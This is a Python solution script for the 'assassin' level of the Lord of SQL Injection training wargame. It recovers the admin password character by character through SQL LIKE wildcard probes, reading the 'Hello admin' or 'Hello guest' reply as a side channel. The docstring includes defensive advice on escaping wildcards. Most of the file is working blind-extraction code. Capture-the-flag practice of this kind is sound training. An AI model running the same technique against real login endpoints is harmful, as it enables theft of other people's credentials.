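"""Recover the "assassin" level password of the Lord of SQL Injection
training wargame (los.rubiya.kr) by character-by-character inference.

How it works, as far as this file shows:

* Every probe sends a ``pw`` value padded with ``_``. The script presumably
  relies on the server matching ``pw`` with SQL ``LIKE``, where ``_`` stands
  for exactly one arbitrary character -- confirm against the challenge source.
* The page answers "Hello admin" or "Hello guest" depending on which account
  the pattern matched; that one bit per request is the whole side channel.
* While admin and guest still share a prefix, the page reports guest, so the
  guest's length/character is used as a stand-in until the two diverge.

Defender's view: the same pattern applies to any endpoint that places
caller-supplied text into a LIKE comparison and reveals whether a row matched.
Escape ``%`` and ``_`` before building LIKE patterns (or use an equality check
on a password hash instead), and watch for bursts of near-identical requests
whose parameter differs by one character and is padded with ``_``.
"""
import os

import requests

password = ''
password_length = -1
URL = 'https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
# The PHPSESSID environment variable takes precedence so that a live session
# id does not have to be saved in (and leaked with) this file.
cookies = {'PHPSESSID': os.environ.get('PHPSESSID', 'INSERT_YOUR_COOKIE_HERE')}
# Seconds to wait for each response; without a timeout one stalled request
# would hang the whole run.
REQUEST_TIMEOUT = 10

# One session for all probes so the TCP/TLS connection is reused.
session = requests.Session()


def probe(pattern):
    """Send *pattern* as the ``pw`` parameter and return the response body.

    Raises ``requests.HTTPError`` on a non-2xx status: an error page contains
    neither greeting and would otherwise be read as "no match", silently
    corrupting the recovered value.
    """
    res = session.get(
        URL,
        params={'pw': pattern},
        headers=headers,
        cookies=cookies,
        timeout=REQUEST_TIMEOUT,
    )
    res.raise_for_status()
    return res.text


# --- Phase 1: length -------------------------------------------------------
# A pattern made only of '_' matches values of exactly that length.
guest_length = -1
for estimated_length in range(1, 20):
    body = probe('_' * estimated_length)
    if "Hello admin" in body:
        password_length = estimated_length
        print("admin's password length is {}".format(password_length))
        break
    elif "Hello guest" in body:
        guest_length = estimated_length

if guest_length > 0 and password_length < 0:
    print("admin's password length is not found. using guest's password length: {}".format(guest_length))
    password_length = guest_length

if password_length < 0:
    # Neither greeting was seen for lengths 1..19. The usual causes are an
    # expired or placeholder PHPSESSID, or a changed challenge page.
    raise SystemExit("no length in 1..19 produced a greeting; check PHPSESSID and URL")

# --- Phase 2: characters ---------------------------------------------------
# NOTE(review): the candidate range '0'..'z' also contains '_' (0x5F), which
# is the filler wildcard itself. Assuming the server treats it as a wildcard,
# a reply to that candidate says nothing about the real character, so a '_'
# in the printed result marks an undetermined position rather than a literal
# underscore.
for current_password_length in range(1, password_length + 1):
    guest_character = ''
    is_found = False
    padding = '_' * (password_length - current_password_length)
    for password_chr in range(ord('0'), ord('z') + 1):
        candidate = chr(password_chr)
        body = probe(password + candidate + padding)
        if "Hello admin" in body:
            password = password + candidate
            is_found = True
            print(password)
            break
        elif "Hello guest" in body:
            # Remember the latest candidate that matched the guest row.
            guest_character = candidate
    if is_found is False:
        if guest_character == '':
            # Nothing in the candidate range matched; every later probe would
            # be one character short and could never match either.
            print("no candidate matched position {}; stopping at {!r}".format(
                current_password_length, password))
            break
        password = password + guest_character
        print("admin's password character unknown. using guest's password character")
        print(password)

if len(password) == password_length:
    # Both spellings are reported because the probe apparently cannot tell
    # letter case apart (presumably a case-insensitive comparison server-side).
    print("Got it. Password is {} or {}.".format(password.upper(), password.lower()))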